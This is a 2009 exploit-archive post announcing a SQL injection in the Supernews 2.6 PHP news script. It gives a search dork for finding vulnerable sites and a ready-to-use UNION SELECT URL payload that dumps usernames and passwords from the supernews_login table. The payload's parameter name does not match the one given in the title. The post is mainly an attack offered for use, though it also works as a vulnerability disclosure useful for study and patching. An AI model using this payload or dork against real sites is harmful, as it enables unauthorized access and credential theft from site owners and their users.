[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability
# Published : 2009-06-03
# Author : DD3str0y3r
# Previous Title : OCS Inventory NG 1.02 Remote File Disclosure Vulnerability
# Next Title : Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability
###############################################################
Supernews 2.6 SQL Injection Vulnability
###############################################################
Download: http://phpbrasil.com/script-download/vT0FaOCySSH/5817
###############################################################
Discovered by Observing and DD3str0y3r
[Collaps3 CREW] - Made In Brazil
###############################################################
Dork: Supernews 2.6
#######################################################################################################################################
Example:
http://wwww.site.com/path/news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--
#######################################################################################################################################
gr33tz: W4n73d, M4v3RiCk, 0xpoint, Ferror, Red Eye, Lady_lara and all my friends
# www.Syue.com [2009-06-03]